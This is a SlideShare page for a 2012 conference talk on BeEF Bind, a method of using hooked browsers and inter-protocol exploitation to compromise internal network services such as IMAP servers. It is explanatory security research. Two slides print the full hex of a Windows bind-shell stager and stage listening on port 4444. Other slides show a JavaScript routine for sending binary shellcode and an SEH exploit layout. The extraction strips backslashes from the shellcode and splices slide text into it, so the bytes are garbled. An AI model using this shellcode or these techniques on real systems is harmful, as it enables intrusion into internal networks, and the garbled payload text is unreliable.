Michele Orru, profile picture
Uploaded byMichele Orru
4,649 views

Rooting your internals - Exploiting Internal Network Vulns via the Browser Using BeEF Bind

The document discusses exploiting internal network vulnerabilities through browser attacks using the Beef framework, detailing current attack methods and limitations. It introduces the Beef Bind shellcode for browser-based exploitation, allowing remote control through JavaScript and addressing challenges like exploit costs and browser security features. Additionally, it covers inter-protocol exploitation techniques to bypass standard restrictions, enhancing the potency of web attacks.

Embed presentation

Downloaded 104 times
Exploiting Internal Network Vulns via the Browser Using BeEF Bind Michele Orru Ty Miller RuxCon 2012
About Us Ty Miller PureHacking •CTO •http://projectshellcode.com/ •"The Shellcode Lab" famous BlackHat training
About Us Michele Orru Trustwave SpiderLabs •BeEF lead core developer •Application Security researcher •Ruby, Javascript and OpenBSD fan
About The Talk • Current situation and traditional browser attack vectors • BeEF and Inter-Protocol Exploitation • The BeEF Bind shellcode • How the shellcode delivery and exploitation works • Demo fun, current limitations and...
Current situation traditional browser attack vectors • Aimed at compromise the browser itself, or plugins • Sandboxes and exploit mitigation techniques make our life difficult • 0-day browser exploits are extremely expensive (Grugq said :-)
Current situation Browser vulnerability exploitation • Is the victims web browser patched? • Do you have $100k to spend on a single 0-day browser exploit? • How many useful browser exploits are available?
Current situation Browser plugin exploitation • Is the plugin patched or vulnerable? • How reliable are the plugin exploits? • some dependent upon browser version and plugin version • some dependent on exact plugin build version • most latest browsers don’t leak anymore exact plugin info • Java-based exploits (also for ROP chains) require user- intervention on many current browsers (i.e. Chrome)
Current situation Cross Site Scripting • Mis-understood, not patched, found in 90% of application pentests • Full DOM manipulation • SOP restrictions, additional HTTP headers restrictions, CSP • In fact, alert(1) is the mostly used attack vector • Oh, no sorry, also stealing cookies...
Current situation traditional browser attack vectors Internal server vulnerabilities are sitting there bored and lonely...
Idea flow read top to bottom Wade: My IPEC research was cool, we should research further Ty: I developed a new staging shellcode that acts like a WebServer Michele: Awesome, let me do some research and lets port it to BeEF
The scary BeEF changing browser attack vectors • Imagine a framework like Metasploit, but for browser-based attacks • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security context abuse. • The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.
The scary BeEF changing browser attack vectors • Through a simple XSS or Phishing page, with BeEF we can hook victim browsers and control them entirely with Javascript • No more alert(1) crap • Features like ManInTheBrowser, Tunneling Proxy and remote exploits are all implemented in (relatively) simple Javascript
Revitalizing IPEC Inter-Protocol Exploitation • Back in 2006/2007 Wade Alcorn researched what he called Inter-Protocol exploitation • Exploit ‘tolerant’ protocol implementations, which do not drop the client connection after N errors • A properly encoded POST request can be sent to the target: • HTTP request headers are parsed as BAD COMMANDS • HTTP request body is parsed as VALID COMMANDS • HTTP request body also contains shellcode. FUN STARTS
Revitalizing IPEC Inter-Protocol Exploitation: limitations • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC Inter-Protocol Exploitation: solution 1 • Limitations: On Firefox and WebKit we can still • SOP and cross-domain restrictions ‘blindly’ send data cross-domain. • PortBanning This is (usually) enough to pwn services. •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC Inter-Protocol Exploitation: solution 2 http://a.com:143/ • Limitations: FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED •SOP and cross-domain restrictions Connection to various known port (22/25/143/993/995/etc..) denied. • PortBanning On Firefox, an extension can override •HTTP Headers size config options: •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC Inter-Protocol Exploitation: solution 3 • Limitations: Lots of headers are automatically created by the browser (around 400 bytes). Most • SOP and cross-domain restrictions of them cannot be overridden, and cross- domain they are bigger. • PortBanning We can override some of them: • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC Inter-Protocol Exploitation: solution 4 • Limitations: The original IPEC paper was using: • SOP and cross-domain restrictions Content-Type: multipart/form-data; • PortBanning Our approach uses, to save space: • HTTP Headers size Content-Type: text/plain; • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC Inter-Protocol Exploitation: solution 5 • Limitations: Not anymore, thanks to the BeEF Bind shellcode. • SOP and cross-domain restrictions You have a bind shellcode which can be • PortBanning totally controlled through an hooked browser sitting in the same victim • HTTP Headers size internal network. • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells?
BeEF Bind shellcode how it works • Ty created a new staging shellcode, which we called var stager = "xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" + BeEF Bind "xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" + "x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" + "xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" + "x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" + • He was bored of reverse shells :D "xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" + "xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" + "x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" + "xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" + • stager -> 299 bytes (326 after bad-char encoding) "x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" + "x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" + "xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" + • "xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" + stage -> 792 bytes "x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" + "x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" + "x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" + • "x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" + The stager sets up a bind port on 4444/TCP to accept "xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" + "x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" + an HTTP POST request containing the raw stage in a "xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" + "x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" + parameter called ‘cmd’. "x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" + "xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" + 20 "x37x96x26x84";
BeEF Bind shellcode var stage_allow_origin = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28" how it works "x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" + "x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" + "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" + "xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" + "x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" + "x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" + "x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" + • "xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" + The stage sets up a bind port on 4444/TCP to accept "xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" + "x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" + HTTP POST requests from the web browser. "x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" + "x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" + "x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" + "x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" + • Set of pipes to redirect the cmd.exe input and output. "xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" + "xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" + "x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" + This allows to jump in the middle of the HTTP request "x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" + "x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" + and the cmd.exe process to implement the web server "x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" + "xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" + style functionality. "x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" + "xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" + "xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" + "xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" + • The command result output is returned with the "x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" + "x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" + "x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" + Access-Control-Allow-Origin: * header. After the stage "x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" + "x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" + is deployed, SOP is not a problem anymore. "x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" + "x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" + "x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" + "x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" + 21 "xfexffxff";
BeEF Bind shellcode how it works The shellcode is also available as a Metasploit module BeEF Bind MSF Payload Module 22
BeEF Bind shellcode how it works Burp/OllyDbg DEMO 23
BeEF Bind shellcode delivery and usage from within BeEF • Shellcode is binary data • Stager and Stage are delivered with XMLHttpRequest.sendAsBinary • For Webkit browsers that don’t support Stager - Stage sendAsBinary, prototype overriding on XHR object. XMLHttpRequest.prototype.sendAsBinary = function(datastr) { function byteValue(x) { return x.charCodeAt(0) & 0xff; } var ords = Array.prototype.map.call(datastr, byteValue); var ui8a = new Uint8Array(ords); this.send(ui8a.buffer); }
BeEF Bind shellcode delivery and usage from within BeEF • We cannot know in advance the exact size of HTTP headers. • A dummy cross-domain XHR request is sent back to BeEF, exact size of headers is calculated, and exploit junk is adjusted accordingly. • Like in all exploits, 1 byte error is enough to have a not-working exploit. • With this approach, errors are minimized.
BeEF Bind shellcode delivery and usage from within BeEF • Typical SEH exploit with EggHunter, non-IPEC: • commands + junk + shellcode + next_seh + seh + egg_hunter • Typical SEH exploit with EggHunter, IPEC: • HTTP_headers + commands + (less)junk + shellcode + next_seh + seh + egg_hunter
BeEF Bind shellcode delivery and usage from within BeEF Immunity dbg view: IMAP process memory when sending the stager
BeEF Bind shellcode delivery and usage from within BeEF Wireshark view: stager delivery Wireshark view: command delivery and results
BeEF Bind shellcode delivery and usage from within BeEF set target exec command Ultimate fun. BeEF IPEC shell (JS) get results 29
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
Demo fun from phishing to internal IMAP server compromise
Thanks • Wade and the other BeEF guys • Ty for his awesome shellcode • Michele for his awesome BeEF integration • RuxCon crew and you, attendees • Whoever will offer beers later...
Questions?

More Related Content

PDF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
byMichele Orru
 
PDF
I'm the butcher would you like some BeEF
byMichele Orru
 
PDF
Dark Fairytales from a Phisherman (Vol. II)
byMichele Orru
 
PDF
Dark Fairytales from a Phisherman
byMichele Orru
 
PDF
Practical Phishing Automation with PhishLulz - KiwiCon X
byMichele Orru
 
PDF
ZeroNights2012_BeEF_Workshop_antisnatchor
byMichele Orru
 
PDF
Buried by time, dust and BeEF
byMichele Orru
 
PDF
Krzysztof Kotowicz - Hacking HTML5
byDefconRussia
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
byMichele Orru
 
I'm the butcher would you like some BeEF
byMichele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
byMichele Orru
 
Dark Fairytales from a Phisherman
byMichele Orru
 
Practical Phishing Automation with PhishLulz - KiwiCon X
byMichele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
byMichele Orru
 
Buried by time, dust and BeEF
byMichele Orru
 
Krzysztof Kotowicz - Hacking HTML5
byDefconRussia
 

What's hot

PPTX
Domino Security - not knowing is not an option (2016 edition)
byDarren Duke
 
PPTX
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
byRob Fuller
 
PDF
Introduction to WebSockets
byGunnar Hillert
 
PDF
ZN27112015
byDenis Kolegov
 
PDF
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
byFelipe Prado
 
PPTX
Interactive web. O rly?
bytimbc
 
PDF
NotaCon 2011 - Networking for Pentesters
byRob Fuller
 
PDF
Developing High Performance and Scalable ColdFusion Application Using Terraco...
byColdFusionConference
 
PDF
Modern PHP Ch7 Provisioning Guide 導讀
byChen Cheng-Wei
 
PPTX
Intro to WebSockets
byGaurav Oberoi
 
PPTX
HTML5 Real Time and WebSocket Code Lab (SFHTML5, GTUGSF)
byPeter Lubbers
 
PDF
A @textfiles approach to gathering the world's DNS
byRob Fuller
 
PDF
Nuts and Bolts of WebSocket Devoxx 2014
byArun Gupta
 
PPTX
A Forgotten HTTP Invisibility Cloak
bySoroush Dalili
 
PPTX
SPDY - or maybe HTTP2.0
byAndreas Bjärlestam
 
PPT
Dmk Bo2 K7 Web
byroyans
 
PPT
Design Reviewing The Web
byamiable_indian
 
PPTX
Websockets in Node.js - Making them reliable and scalable
byGareth Marland
 
PDF
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
byChris Gates
 
PDF
Frans Rosén Keynote at BSides Ahmedabad
bySecurity BSides Ahmedabad
 
Domino Security - not knowing is not an option (2016 edition)
byDarren Duke
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
byRob Fuller
 
Introduction to WebSockets
byGunnar Hillert
 
ZN27112015
byDenis Kolegov
 
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
byFelipe Prado
 
Interactive web. O rly?
bytimbc
 
NotaCon 2011 - Networking for Pentesters
byRob Fuller
 
Developing High Performance and Scalable ColdFusion Application Using Terraco...
byColdFusionConference
 
Modern PHP Ch7 Provisioning Guide 導讀
byChen Cheng-Wei
 
Intro to WebSockets
byGaurav Oberoi
 
HTML5 Real Time and WebSocket Code Lab (SFHTML5, GTUGSF)
byPeter Lubbers
 
A @textfiles approach to gathering the world's DNS
byRob Fuller
 
Nuts and Bolts of WebSocket Devoxx 2014
byArun Gupta
 
A Forgotten HTTP Invisibility Cloak
bySoroush Dalili
 
SPDY - or maybe HTTP2.0
byAndreas Bjärlestam
 
Dmk Bo2 K7 Web
byroyans
 
Design Reviewing The Web
byamiable_indian
 
Websockets in Node.js - Making them reliable and scalable
byGareth Marland
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
byChris Gates
 
Frans Rosén Keynote at BSides Ahmedabad
bySecurity BSides Ahmedabad
 

Viewers also liked

PDF
Talking about exploit writing
bysbha0909
 
PDF
Hacking school computers for fun profit and better grades short
byVincent Ohprecio
 
PDF
Shellcode Analysis - Basic and Concept
byJulia Yu-Chin Cheng
 
PDF
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
PDF
Advances in BeEF - AthCon2012
byMichele Orru
 
PDF
Manual Unpacking + By Re.M J Nop790
byguest747ad9d
 
PDF
Storm Worm - Malware 2.0
byKurt Baumgartner
 
PDF
Efficient Bytecode Analysis: Linespeed Shellcode Detection
byGeorg Wicherski
 
PDF
Anatomy of A Shell Code, Reverse engineering
byAbhineet Ayan
 
PDF
Linux Shellcode disassembling
byHarsh Daftary
 
PPTX
07 - Bypassing ASLR, or why X^W matters
byAlexandre Moneger
 
ODP
Design and implementation_of_shellcodes
byAmr Ali
 
PPTX
Java Shellcode Execution
byRyan Wincey
 
PDF
Shellcode and heapspray detection in phoneyc
byZ Chen
 
PPTX
05 - Bypassing DEP, or why ASLR matters
byAlexandre Moneger
 
PPTX
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
byAjin Abraham
 
PPTX
Anton Dorfman. Shellcode Mastering.
byPositive Hack Days
 
PPTX
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
bymidnite_runr
 
PPTX
Exploit Research and Development Megaprimer: Win32 Egghunter
byAjin Abraham
 
PDF
One Shellcode to Rule Them All: Cross-Platform Exploitation
byQuinn Wilton
 
Talking about exploit writing
bysbha0909
 
Hacking school computers for fun profit and better grades short
byVincent Ohprecio
 
Shellcode Analysis - Basic and Concept
byJulia Yu-Chin Cheng
 
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
Advances in BeEF - AthCon2012
byMichele Orru
 
Manual Unpacking + By Re.M J Nop790
byguest747ad9d
 
Storm Worm - Malware 2.0
byKurt Baumgartner
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
byGeorg Wicherski
 
Anatomy of A Shell Code, Reverse engineering
byAbhineet Ayan
 
Linux Shellcode disassembling
byHarsh Daftary
 
07 - Bypassing ASLR, or why X^W matters
byAlexandre Moneger
 
Design and implementation_of_shellcodes
byAmr Ali
 
Java Shellcode Execution
byRyan Wincey
 
Shellcode and heapspray detection in phoneyc
byZ Chen
 
05 - Bypassing DEP, or why ASLR matters
byAlexandre Moneger
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
byAjin Abraham
 
Anton Dorfman. Shellcode Mastering.
byPositive Hack Days
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
bymidnite_runr
 
Exploit Research and Development Megaprimer: Win32 Egghunter
byAjin Abraham
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
byQuinn Wilton
 

Similar to Rooting your internals - Exploiting Internal Network Vulns via the Browser Using BeEF Bind

PDF
If You Tolerate This, Your Child Processes Will Be Next
byBart Leppens
 
PDF
Owasp AppSecEU 2015 - BeEF Session
byBart Leppens
 
PDF
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
byFelipe Prado
 
PDF
Antisnatchor all you ever wanted to know about beef
byDefconRussia
 
PDF
How WebHooks Will Make Us All Programmers
byJeff Lindsay
 
PPT
Teflon - Anti Stick for the browser attack surface
bySaumil Shah
 
PDF
Shake Hooves With BeEF - OWASP AppSec APAC 2012
byChristian Frichot
 
PPT
Writing Metasploit Plugins
byamiable_indian
 
PDF
Defcon CTF quals
bysnyff
 
PDF
Web Requests, Down To The Atom
byChristopher Zacharias
 
PDF
Hacking (with) WebSockets
bySergey Shekyan
 
PDF
BeEF_EUSecWest-2012_Michele-Orru
byMichele Orru
 
PDF
Wfuzz para Penetration Testers
bySource Conference
 
PPTX
Anatomy of a Buffer Overflow Attack
byRob Gillen
 
PDF
Thug: a new low-interaction honeyclient
byAngelo Dell'Aera
 
PDF
Python for Penetration testers
byChristian Martorella
 
PPT
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
byStephan Chenette
 
PDF
APIs That Make Things Happen
byJeff Lindsay
 
PDF
Server-Sent Events (real-time HTTP push for HTML5 browsers)
byyay w00t
 
PPTX
Crossing Origins by Crossing Formats
byinternot
 
If You Tolerate This, Your Child Processes Will Be Next
byBart Leppens
 
Owasp AppSecEU 2015 - BeEF Session
byBart Leppens
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
byFelipe Prado
 
Antisnatchor all you ever wanted to know about beef
byDefconRussia
 
How WebHooks Will Make Us All Programmers
byJeff Lindsay
 
Teflon - Anti Stick for the browser attack surface
bySaumil Shah
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
byChristian Frichot
 
Writing Metasploit Plugins
byamiable_indian
 
Defcon CTF quals
bysnyff
 
Web Requests, Down To The Atom
byChristopher Zacharias
 
Hacking (with) WebSockets
bySergey Shekyan
 
BeEF_EUSecWest-2012_Michele-Orru
byMichele Orru
 
Wfuzz para Penetration Testers
bySource Conference
 
Anatomy of a Buffer Overflow Attack
byRob Gillen
 
Thug: a new low-interaction honeyclient
byAngelo Dell'Aera
 
Python for Penetration testers
byChristian Martorella
 
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
byStephan Chenette
 
APIs That Make Things Happen
byJeff Lindsay
 
Server-Sent Events (real-time HTTP push for HTML5 browsers)
byyay w00t
 
Crossing Origins by Crossing Formats
byinternot
 

Recently uploaded

PDF
Supercharge Your Copilot-Driven Collaboration with Microsoft 365 Agents SDK
byAntti Koskela
 
PPTX
NTG - Data Center Management System Software
byMustafa Kuğu
 
PDF
2026_01_28 - OpenMetadata Community Meeting.pdf
byOpenMetadata
 
PPTX
The Lex Wire Precedent: A Technical Standard for Machine-Mediated Authority ...
byJeff Howell
 
PDF
OpenCharacter AI Reviews: Features, Plans, and Best Alternative
byOpenCharacter AI
 
PDF
Mesh WiFi Router: The Smart Solution for Fast, Seamless, Whole-Home Internet
byAeroMesh Systems
 
PDF
AI and Zero Trust: What it takes to do it right
byMark Simos
 
PDF
What Is the Azure AI Foundry and Why Does It Matter for Enterprises?
byjohncarterjn
 
PPTX
TechSprint (SJBIT) 2025-26 Hackathon Winners & Awards Ceremony
bysuhasspgdg
 
PDF
Agentic AI with Google ADK GDG On Campus Netaji Subhash Engineering College
bydscnsecorg
 
PPTX
TechSprint WinterHack — Top 10 Teams Pitching Session we are excited for pit...
bybajpaitusharoffon678
 
PDF
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
PDF
UiPath Automation Developer Associate Training Series 2026 - Session 1
byDianaGray10
 
PPTX
Retrieval Augmented Generation- The Synergistic Power of Prompt Engineering
bySemantic SEO BD
 
PPTX
Career-Opportunities in Industrial Arts Grade 8 PPT Lesson 2
byFSBTLEDNathanVince
 
PDF
Startup Formation Collapses While Acquisition Activity Hits New High!
byMemoori
 
PDF
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
PDF
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
PDF
Analyze and Preserve Logs - RHCSA (RH134).pdf
byLinuxCert Guru
 
PPTX
TechSprint Inauguration at SJB Institute of Technology held on 18 December 2025
bysuhasspgdg
 
Supercharge Your Copilot-Driven Collaboration with Microsoft 365 Agents SDK
byAntti Koskela
 
NTG - Data Center Management System Software
byMustafa Kuğu
 
2026_01_28 - OpenMetadata Community Meeting.pdf
byOpenMetadata
 
The Lex Wire Precedent: A Technical Standard for Machine-Mediated Authority ...
byJeff Howell
 
OpenCharacter AI Reviews: Features, Plans, and Best Alternative
byOpenCharacter AI
 
Mesh WiFi Router: The Smart Solution for Fast, Seamless, Whole-Home Internet
byAeroMesh Systems
 
AI and Zero Trust: What it takes to do it right
byMark Simos
 
What Is the Azure AI Foundry and Why Does It Matter for Enterprises?
byjohncarterjn
 
TechSprint (SJBIT) 2025-26 Hackathon Winners & Awards Ceremony
bysuhasspgdg
 
Agentic AI with Google ADK GDG On Campus Netaji Subhash Engineering College
bydscnsecorg
 
TechSprint WinterHack — Top 10 Teams Pitching Session we are excited for pit...
bybajpaitusharoffon678
 
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
UiPath Automation Developer Associate Training Series 2026 - Session 1
byDianaGray10
 
Retrieval Augmented Generation- The Synergistic Power of Prompt Engineering
bySemantic SEO BD
 
Career-Opportunities in Industrial Arts Grade 8 PPT Lesson 2
byFSBTLEDNathanVince
 
Startup Formation Collapses While Acquisition Activity Hits New High!
byMemoori
 
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
Analyze and Preserve Logs - RHCSA (RH134).pdf
byLinuxCert Guru
 
TechSprint Inauguration at SJB Institute of Technology held on 18 December 2025
bysuhasspgdg
 

Rooting your internals - Exploiting Internal Network Vulns via the Browser Using BeEF Bind

  • 1.
    Exploiting Internal NetworkVulns via the Browser Using BeEF Bind Michele Orru Ty Miller RuxCon 2012
  • 2.
    About Us Ty Miller PureHacking •CTO •http://projectshellcode.com/ •"The Shellcode Lab" famous BlackHat training
  • 3.
    About Us Michele Orru Trustwave SpiderLabs •BeEF lead core developer •Application Security researcher •Ruby, Javascript and OpenBSD fan
  • 4.
    About The Talk • Current situation and traditional browser attack vectors • BeEF and Inter-Protocol Exploitation • The BeEF Bind shellcode • How the shellcode delivery and exploitation works • Demo fun, current limitations and...
  • 5.
    Current situation traditional browserattack vectors • Aimed at compromise the browser itself, or plugins • Sandboxes and exploit mitigation techniques make our life difficult • 0-day browser exploits are extremely expensive (Grugq said :-)
  • 6.
    Current situation Browser vulnerabilityexploitation • Is the victims web browser patched? • Do you have $100k to spend on a single 0-day browser exploit? • How many useful browser exploits are available?
  • 7.
    Current situation Browser pluginexploitation • Is the plugin patched or vulnerable? • How reliable are the plugin exploits? • some dependent upon browser version and plugin version • some dependent on exact plugin build version • most latest browsers don’t leak anymore exact plugin info • Java-based exploits (also for ROP chains) require user- intervention on many current browsers (i.e. Chrome)
  • 8.
    Current situation Cross SiteScripting • Mis-understood, not patched, found in 90% of application pentests • Full DOM manipulation • SOP restrictions, additional HTTP headers restrictions, CSP • In fact, alert(1) is the mostly used attack vector • Oh, no sorry, also stealing cookies...
  • 9.
    Current situation traditional browserattack vectors Internal server vulnerabilities are sitting there bored and lonely...
  • 10.
    Idea flow read topto bottom Wade: My IPEC research was cool, we should research further Ty: I developed a new staging shellcode that acts like a WebServer Michele: Awesome, let me do some research and lets port it to BeEF
  • 11.
    The scary BeEF changingbrowser attack vectors • Imagine a framework like Metasploit, but for browser-based attacks • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security context abuse. • The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.
  • 12.
    The scary BeEF changingbrowser attack vectors • Through a simple XSS or Phishing page, with BeEF we can hook victim browsers and control them entirely with Javascript • No more alert(1) crap • Features like ManInTheBrowser, Tunneling Proxy and remote exploits are all implemented in (relatively) simple Javascript
  • 13.
    Revitalizing IPEC Inter-Protocol Exploitation • Back in 2006/2007 Wade Alcorn researched what he called Inter-Protocol exploitation • Exploit ‘tolerant’ protocol implementations, which do not drop the client connection after N errors • A properly encoded POST request can be sent to the target: • HTTP request headers are parsed as BAD COMMANDS • HTTP request body is parsed as VALID COMMANDS • HTTP request body also contains shellcode. FUN STARTS
  • 14.
    Revitalizing IPEC Inter-Protocol Exploitation:limitations • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells?
  • 15.
    Revitalizing IPEC Inter-Protocol Exploitation:solution 1 • Limitations: On Firefox and WebKit we can still • SOP and cross-domain restrictions ‘blindly’ send data cross-domain. • PortBanning This is (usually) enough to pwn services. •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells?
  • 16.
    Revitalizing IPEC Inter-Protocol Exploitation:solution 2 http://a.com:143/ • Limitations: FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED •SOP and cross-domain restrictions Connection to various known port (22/25/143/993/995/etc..) denied. • PortBanning On Firefox, an extension can override •HTTP Headers size config options: •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells?
  • 17.
    Revitalizing IPEC Inter-Protocol Exploitation:solution 3 • Limitations: Lots of headers are automatically created by the browser (around 400 bytes). Most • SOP and cross-domain restrictions of them cannot be overridden, and cross- domain they are bigger. • PortBanning We can override some of them: • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells?
  • 18.
    Revitalizing IPEC Inter-Protocol Exploitation:solution 4 • Limitations: The original IPEC paper was using: • SOP and cross-domain restrictions Content-Type: multipart/form-data; • PortBanning Our approach uses, to save space: • HTTP Headers size Content-Type: text/plain; • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells?
  • 19.
